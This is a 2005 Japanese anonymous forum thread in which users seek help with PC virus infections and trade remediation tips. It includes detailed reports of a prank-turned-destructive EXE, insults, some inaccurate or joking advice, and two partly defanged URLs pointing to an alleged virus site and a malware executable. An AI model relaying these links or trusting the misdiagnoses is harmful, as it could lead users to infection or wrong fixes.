【WindowsUpdateしてるか】してます
【AntiVirusは何を使っているか】ノートンアンチ2004
【ちゃんとUpdateしてるか】してます
【スキャンした結果（ウイルス名・発見場所）】
発生源: (アプリ) - imail ver0170 (PCから任意のi-modeアドレスでメールを送れますフリーウェア)
/iMail.exe
説明: 圧縮されたファイル (L:\160G\ジャンル別ファイル\アプリなど未整理
\(アプリ) - imail ver0170 (PCから任意のi-modeアドレスでメールを送れますフリーウェア)(1).zip)
内の ((アプリ) - imail ver0170 (PCから任意のi-modeアドレスでメールを
送れますフリーウェア)/iMail.exe) は Trojan.Dropper ウイルスに感染しています。
クリックするとこのウイルスについての詳しい情報を表示します : Trojan.Dropper

【別のオンラインスキャンしたならその結果は】駆除されてるのに解決しません。
【症状を具体的に、分かる限りすべて書く】メールの受送信をするたびにnetskyが送られてくる。
【何をしたらそんなことになったのか】上記を回答したからだと思います
【これまでにとった措置】
【その他の質問】
900 名前：名無しさん＠お腹いっぱい。 [2005/05/01(日) 03:07:41 ]: ウイルスに感染してPCが爆音になることってありますか？
901 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 04:19:40 ]: あるだろ。　100％リソース食いつくし過熱。
CPUファンが回りっぱなしになって爆音。
902 名前：名無しさん＠お腹いっぱい。 [2005/05/01(日) 05:05:38 ]: 会社のＰＣが次々とドライブ消失しています。
Ｃドライブ以外のＦＤ、ＣＤなどです。
ウィルスと思われますが、シマンテックやトレンドマイクロの
サイトにはこうした情報は見当たりません。
ちなみに会社ではノートン・アンチウィルス・コーポレートエディションを
導入しています。
ドライブ消失させるウィルスの情報はありませんか？
903 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 06:25:00 ]: >>902
なんぼでもある
904 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 06:43:24 ]: 　　　　　　　　 {!!!!`'ヽ、
　　　　　　　　 ~‐-,,〟ヽ
　　　　　　　　　＿人　｀j
　　　　　　　 γ⌒ 　　ノ
　　　　 ∧∧ｲ　　　 ,;´
　　　　（ ´_ゝ）　　く
　_　　 j　　　　　ノ）
ｊｊｊｊ｣　 f¨　　　　　!_ ~￣￣￣''ーy,,　　＿＿,;-ー､
i　;~　 j　　 ⌒ヽ´ 　 ~　-‐-､　　　　￣"”　　　　　 `'ヽ
'!,　`ーI　　;＿ミ　　　　￣~`ヽ､__､　　　 ,,-ー"ー､--'　　　.'　　，　．. ∧＿∧
　|　　　｀ﾉ　"''ー-人　　　　　　ヽ_;-ー"¨“''-'´　 `ｰ;､　 .∴　'　　　　（>>903）
　¨''ｰ-－'　　　　　￣''ー-,,__　　　　　　＿;-ー-;,_､　　j　・,‘　ｒ⌒>　 _／／
　　　　　　　　　　　　　　　　￣''￣''--'´　　　　　 "`'´　. 　’ |　ｙ'⌒　　⌒i
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　|　　／　　ノ｜
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　ー' 　／´ヾ_ﾉ
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　／　,　　ノ
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　／　／／
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　／　／　,'
　　　　　　　　　　　　　　　　　　　　　　　　　　　　／　／| 　|
　　　　　　　　　　　　　　　　　　　　　　　　　　　　!､＿／ / 　〉
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　|_／
905 名前：名無しさん＠お腹いっぱい。 [2005/05/01(日) 07:07:25 ]: ウイルス監視ｿﾌﾄ入れたら、ネットのレスポンスが遅くなった気がします。
また、かちゅしゃが鈍くなりました。
なぜですか？
906 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 07:09:19 ]: メモリが呼吸困難
907 名前：名無しさん＠お腹いっぱい。 [2005/05/01(日) 07:30:50 ]: ex10.2ch.net/test/read.cgi/news4vip/1114639169/

ここ開くと何でこうなるのですか?とストレートに聴いてみるテスト
908 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 07:43:36 ]: >>907
ぜんぜんストレートじゃないので何を言っているのかわかりません。
909 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 08:32:39 ]: >>902
真っ裸の状態と鎧着た状態と、どっちが早く楽に走れる？
で、どっちが防御強い？
それと同じ事。

>>907
まったくもって意味がわかりませんな・・・
910 名前：名無しさん＠お腹いっぱい。 [2005/05/01(日) 09:33:42 ]: ノートンでもバスターでも取れないウイルスが有ったのだけど、どうすればいいの？
激害ウイルスかどうか不明。
OSインストルは無理です。
そのまま使っていたらヤバイ？
911 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 10:45:10 ]: >>910
なんていうウイルスでなぜ取れないのか書かないとわからん
>>1参照
912 名前：名無しさん＠お腹いっぱい。 [2005/05/01(日) 14:25:21 ]: 【使用OS】 XP home

【WindowsUpdateしてるか】しています

【AntiVirusは何を使っているか】使ってません

【別のオンラインスキャンしたならその結果は】　トレンドマイクロのオンラインスキャンで発見できず

【症状を具体的に、分かる限りすべて書く】　
起動時に、窓が物凄い勢いで開きまくり、ゴキブリの画像が縦横無人に走っていきました
すぐその場で再起動かけましたが、マイドキュメント内のファイルが吹っ飛び、かわりに(･ё･)00001.jpgなどの
ファイルが作られていました。

【何をしたらそんなことになったのか】　とても人には言えないようなEXEファイルを開いてしまいました
EXEファイル自体はオンラインスキャンに反応もせず、安心してクリックしたところ、明らかにウィルス仕込まれた
ような挙動をしたので、すぐにその場でオンラインスキャンしたんですが何も検出されませんでした。
そして今朝再起動したところ、上のような症状が出た次第です。

【これまでにとった措置】　再起動してトレンドマイクロオンラインスキャンにかけています
913 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 14:51:57 ]: >>912
ご愁傷様。
出所不明のexeを実行する辺りが甘いです。
914 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 15:01:02 ]: >>912
ウィルスと不正プログラムの区別がついていないと思われ。
キミが実行したのは、ウィルスでもワームでもない「悪質なプログラム」であって、
自分で実行しない限り被害がでないもの。
自分で自分の身体に裸の電気コードを巻きつけて高圧線につないで、「なんで？」って言ってるようなもの。
915 名前：名無しさん＠お腹いっぱい。 [2005/05/01(日) 15:05:58 ]: ウィルスがそもそも不正プログラムだろ。
916 名前：912 mailto:sage [2005/05/01(日) 15:10:44 ]: 現在AVG無料版にてウィルススキャン中です
FINALDATAでデータサルベージできればと思い作業中です

>>913
返す言葉もございません

>>914
不正プログラムの一種がウィルスだと認識していますが
917 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 15:20:02 ]: ウィルスと不正(悪質な)プログラムはイコールじゃない罠。
918 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 15:21:56 ]: ウィルスは不正なプログラムであっても、不正なプログラムはウィルス・ワームとは限らない。
919 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 15:31:17 ]: >>916
逆切れですか？ｗ
不正プログラムの一種がウィルスだと認識しているなら、
ウィルスでない不正プログラムが存在する、即ちウィルススキャンでOKでも出所不明のexeは危ないと分かるはずだが。
分かってないからスキャンしてOK即実行という行動に走ったんじゃないのかな。
920 名前：名無しさん＠お腹いっぱい。 [2005/05/01(日) 15:31:20 ]: 【使用OS】 WindowsＸＰ
【WindowsUpdateしてるか】してます。
【AntiVirusは何を使っているか】ウイルスバスター２００５（笑）
【ちゃんとUpdateしてるか】なんか勝手に自動更新してますが
【スキャンした結果（ウイルス名・発見場所）】 TROJ_ANICMOO.F
【別のオンラインスキャンしたならその結果は】してません
【症状を具体的に、分かる限りすべて書く】いままで気づきませんでした
【何をしたらそんなことになったのか】不明
【これまでにとった措置】　ウイルスバスターで除去
【その他の質問】
べつにウイルスで困っているわけではなくて
このTROJ_ANICMOO.F というウイルスが
どんな悪さをするのかをお聞きしたいです。
よろしく御願いします。
921 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 15:34:21 ]: >>916
シマンテックでもやってみたら？

>>920
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_ANICMOO.F
922 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 15:35:49 ]: >>920
トレンドマイクロの日本語サイトにはまだTROJ_ANICMOO.Fの情報は載ってないね。
別亜種のwww.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_ANICMOO.Cを参考に。
923 名前：922 mailto:sage [2005/05/01(日) 15:37:03 ]: >>921
ありゃ、載ってましたか。逝ってきます…
924 名前：920 mailto:sage [2005/05/01(日) 15:39:01 ]: >>921
回答ありがとうです。

そういえばウイルスバスターの「隔離」って
「削除」ではないので、ちと心配だったりして…。
925 名前：912 mailto:sage [2005/05/01(日) 15:42:05 ]: >>919
なぜそんな挑発的なのかがわかりませんのでスルーさせていただきます

>>921
AVGが終わったらシマンテックでもやってみます
926 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 15:47:22 ]: >>925
いちいち報告しなくてもいいから、後でまとめて報告汁。
どっかのスキャンでひっかかるといいけどね。
データのサルベージもひどいのになると全部0で上書きされたりするし。
Good Luck!
927 名前：名無しさん＠お腹いっぱい。 [2005/05/01(日) 16:33:49 ]: アドウェアってどうやって削除するんすかね？
928 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 16:38:50 ]: >>927
ソフトで削除できるものはソフトで。
929 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 21:30:27 ]: panda active scanってすごいですね
当方AVG入れていて、シマンテックでスキャンかけたら1個トロイに感染していたので
改めてAVGでスキャンしたのに0
怪しいのでパンダみたらすでに2個感染って・・・
930 名前：名無しさん＠お腹いっぱい。 [2005/05/01(日) 21:48:49 ]: やっとこのｽﾚにたどり着けましたが、携帯からなのでうまくﾃﾝﾌﾟﾚ通りに質問出来ないかと思いますがよろしくお願いします。

Windows98を使用してます。
Updateはしていません。
ｳｲﾙｽｿﾌﾄは期限切れの役立たずが入ってます。

症状は、突然ﾈｯﾄが繋がらなくなり、その後突然ｽｷｬﾝﾃﾞｨｽｸが始まりｴﾗｰﾁｪｯｸが終わりﾊﾟｿｺﾝが立ち上がりかけると同時にまたｽｷｬﾝﾃﾞｨｽｸが始まり…と延々と続いてしまいます。
safemodeでは立ち上がるのですが、ﾈｯﾄに繋げられなかったのでｳｲﾙｽのｵﾝﾗｲﾝ除去を利用出来なかったです。
半日かけてﾃﾞﾌﾗｸﾞ、ｽﾀｰﾄｱｯﾌﾟの全てのﾁｪｯｸはずし、などを実行してみましたがﾀﾞﾒでした。

ｳｲﾙｽに感染してしまったのでしょうか？それともﾊﾟｿｺﾝが壊れてしまったのでしょうか？
ﾈｯﾄに繋げられないのでこの先に進めず困っています。どなたかｳｲﾙｽの駆除方法などご指導お願いします。
931 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 22:03:35 ]: >>912
その「とても人には言えないようなEXEファイル」はどこで拾ってきたの？
思い当たる事あるから教えてみ。
932 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 23:04:16 ]: >>931
912ではないですが、「らぶデスモザイク消しセット」で同じ状況になりました。
システムの復元も使えなくなってるしもうたまりません・・・。迂闊過ぎでした。
933 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 23:12:22 ]: >>930
ブラスター・コードレッドと呼ばれる進入型のウィルスです。98の場合は落ちる場合が多いようです。
感染しているかどうかは不明ですが、このままでは一生ネットに接続できません。
次のうちのいずれかの行動をしてください。
１．ＮＩＳ・バスターなどのファイヤーウォール付きのソフトを買う
２．ルーターを買う
３．WidowsXP　SP2を買う。

１がお勧めですが、試せるものがあれば、２・３でもかまいません。
934 名前：930 [2005/05/01(日) 23:33:35 ]: >933
ﾚｽありがとうございます。
さっそく1を試してみます。
侵入型のｳｲﾙｽということはどこかのｻｲﾄを開いた時に、うちのﾊﾟｿｺﾝに侵入して来たと思っていいのでしょうか？

今現在ﾊﾟｿｺﾝはsafemodeでしか立ち上がらないのですが、ｳｲﾙｽｿﾌﾄをｲﾝｽﾄｰﾙする事は可能なのでしょうか？
初心者な質問で申し訳ありませんが、よろしくお願いします。
935 名前：名無しさん＠お腹いっぱい。 [2005/05/01(日) 23:44:23 ]: ウイルススキャンに3時間かかりました。
そんなにかかるものですか？
あと、ウイルスソフト入れたら、ｐｃ内部でウイルス的な動きがあったら、検知するのですか？（感染しているウイルス）
936 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 23:47:22 ]: ガキはパソコン使うなって言ってるんだよ
937 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 23:49:58 ]: パソコンはガキ使うなって言ってるんだよ
938 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 23:50:20 ]: >>933
ttp://www.trendmicro.co.jp/codered/index.asp
コードレッドは98系では発症しないらしいが。
939 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 23:53:05 ]: >>935
>ウイルスソフト入れたら、ｐｃ内部でウイルス的な動きがあったら、検知するのですか？（感染しているウイルス）
ウイルスによってはライバル視しているウイルスを検知して削除する奴もある。w
940 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/01(日) 23:54:45 ]: >>935
スキャン時間は検索ソフトや、HDD容量、ファイル数によって時間が異なる。
941 名前：名無しさん＠お腹いっぱい。 [2005/05/02(月) 01:18:09 ]: >>933
FWってZONEALARMでも同じかな？
942 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 01:43:04 ]: >>938
じゃ、ブラスターだね。
943 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 01:44:12 ]: >>941
効果あります。ただ、ダウンロードをネットに繋がずには出来ない点が難点です。
944 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 02:33:18 ]: 効果あるんですね、どうもです
945 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 02:36:06 ]: 漫喫に行ってUSBメモリやCD-Rに落としてくるという手もある
946 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 02:53:46 ]: >>930
>Windows98を使用してます。
>Updateはしていません。
>ｳｲﾙｽｿﾌﾄは期限切れの役立たずが入ってます。

そのまま一生死んどいていいよ
947 名前：912 mailto:sage [2005/05/02(月) 03:06:01 ]: >>931
>932の人に聞いてみてください・・・
確認してみたら私もシステムの復元が使えなくなってました
システムのプロパティからシステムの復元タブを見てみると　「すべてのドライブで復元を無効にする」　に
チェックが入っていたため、これのチェックを外して適用させると

「１つ以上のドライブを有効または無効にしようとしたときにエラーが発生しました。コンピュータを再起動して再試行してください。」

のメッセージが出てきてできませんでした

結果について報告します
データサルベージについては、FINALDATAでテキストデータの一部はサルベージ可能でした
それ以外のデータは書き換えられててサルベージしても無意味そうなので諦めました
シマンテックでもウィルスは検出されませんでした

システムの復元以外は特に目立った不具合は通常使用上はなさそうです
948 名前：912 mailto:sage [2005/05/02(月) 03:12:08 ]: ちなみに　システムの復元　１つ以上のドライブを　でぐぐると
1 名前：よ～く考えよ～ウイルス危険だよ
なる名前のスレがヒットし、63が今回の私と同じ症状のようです
ただ、解決はしてませんでした
>>932の中の人、ご参考までに
949 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 03:16:50 ]: >>948
お疲れ様でした。
せっかくの休みが大変なことになってしまいましたね。
950 名前：912 mailto:sage [2005/05/02(月) 03:24:35 ]: >>949
元は自分の撒いた種ですからね・・・
自業自得です
明日の仕事間に合うかしらorz
おやすみなさい
951 名前：名無しさん＠お腹いっぱい。 [2005/05/02(月) 08:24:44 ]: >>912
これと違うか？

ダウンロードありがとうございますｍ(_ _)ｍ。

このソフトは、イタズラが目的のソフトです。
イタズラ以外に使い道がありません。
デスクトップにゴキブリやハエが出現したり、勝手にディスクをフォーマット(嘘ですが）したりします。
ハエやゴキブリは出現している間も、Windows通常の操作ができます。
出現時間や、出現するキャラクターの設定もできます。
ゴキブリやハエが嫌いな人は使用しないで下さい。(＾_＾;)
また、ジョークの分からない人、及び、心臓の弱い人に使用するのもやめてくださいｍ(_ _)ｍ
952 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 08:30:06 ]: >>951
そのソフトを元に、誰かが悪質に改竄したものじゃないか？
データが書き換えられてるようだから。ジョークの域を超えている。
元ソフトはVectorでダウソできる。
953 名前：951 [2005/05/02(月) 08:35:47 ]: >>952
ああ、その可能性あるな
954 名前：名無しさん＠お腹いっぱい。 [2005/05/02(月) 12:15:35 ]: age
955 名前：柴田強兵 mailto:sage [2005/05/02(月) 13:00:09 ]: たちが悪いな。
956 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 13:01:46 ]: 　　　　　　　　 {!!!!`'ヽ、
　　　　　　　　 ~‐-,,〟ヽ
　　　　　　　　　＿人　｀j
　　　　　　　 γ⌒ 　　ノ
　　　　 ∧∧ｲ　　　 ,;´
　　　　（ ´_ゝ）　　く
　_　　 j　　　　　ノ）
ｊｊｊｊ｣　 f¨　　　　　!_ ~￣￣￣''ーy,,　　＿＿,;-ー､
i　;~　 j　　 ⌒ヽ´ 　 ~　-‐-､　　　　￣"”　　　　　 `'ヽ
'!,　`ーI　　;＿ミ　　　　￣~`ヽ､__､　　　 ,,-ー"ー､--'　　　.'　　，　．. ∧＿∧
　|　　　｀ﾉ　"''ー-人　　　　　　ヽ_;-ー"¨“''-'´　 `ｰ;､　 .∴　'　　　　(>>955）
　¨''ｰ-－'　　　　　￣''ー-,,__　　　　　　＿;-ー-;,_､　　j　・,‘　ｒ⌒>　 _／／
　　　　　　　　　　　　　　　　￣''￣''--'´　　　　　 "`'´　. 　’ |　ｙ'⌒　　⌒i
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　|　　／　　ノ｜
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　ー' 　／´ヾ_ﾉ
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　／　,　　ノ
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　／　／／
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　／　／　,'
　　　　　　　　　　　　　　　　　　　　　　　　　　　　／　／| 　|
　　　　　　　　　　　　　　　　　　　　　　　　　　　　!､＿／ / 　〉
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　|_／
957 名前：名無しさん＠お腹いっぱい。 [2005/05/02(月) 13:32:48 ]: 質問です。
特定のURLをクリックすれば、ブラクラやウィルスの可能性があります。
ブラクラはフリーウェアで確認できるようですが、ウィルスは無理です。
ウィルスかどうかを確認する方法は、専用のウィルス対策ソフトを買うしかないのでしょうか。
確認する方法があれば、教えてください。
958 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 13:34:59 ]: >>957
実際に踏んでみて感染したらウイルス。

ソフト導入推奨。
959 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 13:43:34 ]: >>957
フリーの常駐監視型のアンチウイルスソフトもあるよ。
【AVG】とか【Avast】とか。
960 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 16:06:10 ]: >>959
avastいれたらめちゃくちゃ重くなったんですが＞XP１

>957
オンラインスキャンでいいと思われ
961 名前：名無しさん＠お腹いっぱい。 [2005/05/02(月) 16:25:11 ]: 「オンラインスキャン」で検索した結果、無料ウィルスチェックソフトが出てきました。ありがとうございます。
ただ、私がほしいのは「グチャグチャに犯された後の対処」じゃなく、ウィルスに犯される前の対処です。
該当するURLがウィルスがあるのかどうか知りたいのです。
962 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 16:26:22 ]: 貧弱なマシン使ってるやつは常駐ソフトを入れることを極端に嫌がって
必要なものまで捨てていく傾向があるよな。
その日が大丈夫だったらその先ずっと大丈夫だと思い込み、
セキュリティザル化状態が習慣となる。
そのうちトロイに簡単に忍び込まれ、システムを改変されて
気が付いた時にはもう手遅れ、って感じだな
963 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 16:28:46 ]: >>961
防御の点から言えばそこにウィルスがあるかどうかを知る必要はないはず。
ローカルで悪さしようとした時点で発動すればいいわけだから。
知って悪用しようという魂胆はないかな？

アンチウィルス入れて古いIEのセキュリティ低で突っ込め！
964 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 16:29:45 ]: >>961
何を勘違いしている。アンチウィルスソフトは予防するのがシゴトだよ。
965 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 16:30:57 ]: >>961

　　 ∩＿＿＿∩
　　 | ノ　　　　　ヽ
　　/　　●　　　● |　クマー
　 |　　　　( _●_)　ミ
　彡､　　　|∪|　　､｀＼
/　＿＿　ヽノ　/´>　 )
(＿＿＿）f^f^f^f^f^f^f^f^f^┐
　|　　　　|~ ~ ~ ~ ~ ~ ~ ~ ~│
　|　　　　|　知ってるが　　│
　|　　／ | 　お前の態度が |
　|　/　　|　気に入らない |
　∪　　　|______＿＿＿＿＿|
　　　　　　　＼＿)
966 名前：名無しさん＠お腹いっぱい。 [2005/05/02(月) 17:08:40 ]: >防御の点から言えばそこにウィルスがあるかどうかを知る必要はないはず。
ローカルで悪さしようとした時点で発動すればいいわけだから。

すいません、根本的に理解できていません。
あなたの言ってるのは「リアルタイム常駐型ウィルスチェックソフト」ですよね。
しかし私が「オンラインスキャン」で検索した結果、入手できたのは、リアルタイムじゃない方式の、ネットワーク上からチェックするだけのソフトなのですが。
検索の仕方が間違っていたとか、そういうことですか？
967 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 17:15:54 ]: >>966
>>959
968 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 17:16:53 ]: >>966
少し上も見れんのか・・・
969 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 17:18:01 ]: >>966
何というソフトを見つけてきたの？
常駐型のアンチウイルスを入れれば良いと思うぞ。
ノートンでもバスターでもフリーのでも好きなのをお使いください。
970 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/02(月) 18:15:23 ]: >>966
なんかゴチャゴチャになってる気がするな

＞該当するURLがウィルスがあるのかどうか知りたいのです。

要はこれだろ？
だったらソースチェッカ使うか、踏む前に判定スレ行って判定して貰え
971 名前：上島龍平 mailto:_@dmz-mail.city.fuji.shizuoka.jp [2005/05/03(火) 00:09:11 ]: 上島龍平

　　　○　　　○　＜押すなよ！絶対に押すなよ！
　　　|こ　／ |
　　　 >ヽ　|⌒ 新しいフォルダ　　　　　　　　　　　　　　　　　　　　　　　　　　.exe
972 名前：アホ　(:D)|￣|＿ mailto:_@ns.city.hamamatsu-szo.ed.jp [2005/05/03(火) 00:14:24 ]: アホ　(:D)|￣|＿

ムラムラっとしてエロファイル落としたら踏んでしまった(:D)|￣|＿
はやる気持ちを押さえきれなかった
今は反省している

村々＞得ろ踏む＞反省＞学習＞村々・・・
973 名前：957 [2005/05/03(火) 02:02:19 ]: 常駐ソフトのアバストを入れました。ありがとうございます。
質問ですが、どうして無料でウィルスチェックソフトをばらまきますか。
974 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/03(火) 02:35:08 ]: >>973
高性能な有償版もある。法人は無料版使えない。
無料版を気に入ったユーザーの一部は有償版に手を出す。
ユーザーが多いとウイルス情報集まりやすい。
975 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/03(火) 02:40:19 ]: >>912
暇だったからボロい捨てPCにぶち込んでみた
PCのスペックがｳﾝｺ過ぎるせいか実行したらプログラムがフリーズ、
再起動したら大量のウィンドウと一瞬ゴキブリが出た。
そのままウィンドウがで続けてフリーズ。
ウィンドウが出まくる前に確認したらC\Documents and Settings\ﾕｰｻﾞｰ名\My docmentが吹っ飛んでた

これ再起動する度にウィンドウが毎回出まくるんだが、912とは別の奴だったかな？
ノートンさんにも引っかからないし一応新種のウィルスかな？
976 名前：名無しさん＠お腹いっぱい。 [2005/05/03(火) 02:51:04 ]: 漏れもネット用のボロPCでやってみた
確認する暇も無くフリーズｗｗ
携帯で書き込みつつ後悔している
977 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/03(火) 02:52:07 ]: >>975
ノートンにもひっかからないとは。ｺﾜｲﾅｰ
978 名前：912 mailto:sage [2005/05/03(火) 03:40:54 ]: >>975
おお！勇者ですね！

仰る通り、再起動する度にロードされる設定に書き換えられます。多分まったく同じブツだと思います
現在はmsconfigから切り離して回避してます
私は再起動した後に窓が山程出てきた段階で何とかしようと試みましたが、すぐに窓に隠れてどうにも
手のうちようがなく、ゴキブリを見た時点ですぐにリセットかけたんですが、次の起動時にはロードされませんでした
多分途中でリセットをかけたため、ウィルス活動が不完全で終わったのではないかと推測します

主な被害状況と私のとった対処方法は

マイドキュメントファイル全削除　→　FINALDATAで一部修復
巨大な(･ё･)****.jpgなどのファイルが作られる、2GB越えのファイルまでありました　→　手動削除
XPだと「システムの復元」機能が完全に潰されます　→　対処方法不明
C:\Program Files\ikenai\ディレクトリが作られ、中にexeがたくさん設置　→　手動削除
スタートアップ項目に上のexeファイルを実行するように書き加える　→　msconfigにて無効化

こんな感じでした
システムの復元が潰された件に関しては、手立てがなく参っております
感染後、Cドライブを
シマンテックセキュリティチェックウィルススキャン、トレンドマイクロオンラインスキャン、AVGフリー版
にかけましたが、すべてスルーです
とても人に言えないexeファイルそのものもスルーです
ご注意下さい
システムの復元方法や、このウィルスに関する対処情報等ございましたらぜひご教示下さい
979 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/03(火) 06:22:35 ]: >>978
AntiVirus使ってればそのファイルを調べてもらうこと出来るのに。。。
980 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/03(火) 06:58:49 ]: 馬鹿を構ったら負け
981 名前：975 mailto:sage [2005/05/03(火) 07:17:38 ]: もはようございます（´・ω・｀）
色々やってみた結果です。

ｳﾝｺﾏｼﾝ＆うp版XPのﾏｼﾝを使った症状：
1.C:\Program Files\ikenai_hoken\フォルダが作られ、
起動時にゴキブリと大量のウィンドウが出るプログラムが作られる

2.スタートアップ項目に８個のikenaiフォルダのプログラムを実行するように加えられる

3.C:\Documents and Settings\ﾕｰｻﾞｰ名\My docment及び
C:\My docmentフォルダの中身が削除され、大きいゴミファイルが作られる

と、同じ症状でしたが、
システムの復元が不可能になる症状は、
ﾏｼﾝがｳﾝｺ過ぎて問題のﾌﾟﾛｸﾞﾗﾑがすぐフリーズするためか、起きませんでした。

感染した時、手っ取り早く動くようにするには、他のHDDにOSを入れるか、
他のPCに問題のHDDを繋げてikenaiﾌｫﾙﾀﾞを消すのが良いのかな

他にも何かありそうですが、とりあえずﾉｰﾄﾝﾗﾝﾁｬｰでｼﾏﾝﾃｯｸに問題のﾌﾞﾂを発射しておきます。
982 名前：名無しさん＠お腹いっぱい。 [2005/05/03(火) 07:47:27 ]: tp://www1.pimpspace.com/japanasian/index.html
　　　　　　　　　　　　　↑
ウイルスサイトらしいのですが、間違って踏んでしまいました・・・
一応、アンチウイルスソフトを入れてるんですが、サイトを踏んだ時には全く反応しませんでした
他に踏んだ人の話だと、ノートンで6個のウイルスが検出されたと言ってました
この場合、僕のＰＣにウイルスには感染しなかったって事なのでしょうか？

ＯＳはＭｅ、ブラウザはＩＥ（ドーナツＱ）でＵｐｄａｔｅ済み
アンチウイルスはＡＶＧ、これも最新の状態にて、常駐保護の設定にしてます（毎日Ｕｐｄａｔｅの確認してる）
ＰＷはＯｕｔｐｏｓｔです
ＦＷとブラウザの設定で、ジャパスクリプトとジャパアプレット、アクティブコントロールＸは無効にしてあります。
ＲｅｇｅｄｉｔでＲｕｎのところを調べてみましたが、特に変わったものはなしです
983 名前：名無しさん＠お腹いっぱい。 [2005/05/03(火) 07:55:38 ]: >>982
たぶんJAVAのキャッシュにウイルスが入ってる。
実害無し。JAVAキャッシュを削除しとけば。
984 名前：名無しさん＠お腹いっぱい。 [2005/05/03(火) 09:44:36 ]: ://aikokuseigijuku.com/attackwares/fortune.exe
メッセンジャー仲間にイイフリーウエアだとかいわれて
ダウンして実行したら・・・orz　たすけてつかあさい
985 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/03(火) 10:27:06 ]: >>984
なんだかわからんがウイルススキャンしたのか？
986 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/03(火) 10:36:06 ]: >>984
わけのわからんexeファイルを拾ってきて実行したおまいの負け
とりあえず>>1のテンプレに従って状況を書いてくれ

McAfeeではきっちり検出したぞ
987 名前：名無しさん＠お腹いっぱい。 [2005/05/03(火) 10:47:29 ]: 【使用OS】 WindowsXPprofessional
【WindowsUpdateしてるか】自動で行うようになってる
【AntiVirusは何を使っているか】 NortonAntiVirus
【ちゃんとUpdateしてるか】しています
【スキャンした結果（ウイルス名・発見場所）】 exeファイルを実行時Trojan Horseとのみ、ノートﾝでは検出されない
【別のオンラインスキャンしたならその結果は】検出されなかった
【症状を具体的に、分かる限りすべて書く】症状はまだ現われていない
【何をしたらそんなことになったのか】ダウンしたexeファイルをＷクリしたorz
【これまでにとった措置】exeファイル削除、ノートﾝアンチウイルススキャンシマンテックオンラインスキャン（検出されず）
【その他の質問】削除の方法、ウイルス正式名称等希望
988 名前：984=987 mailto:sage [2005/05/03(火) 10:52:58 ]: 追加
【これまでにとった措置】システムの復元を無効化、セーフモードでノートンスキャン、検出されず
989 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/05/03(火) 10:53:40 ]: そのメッセンジャー仲間とやらに聞けばいいと思います
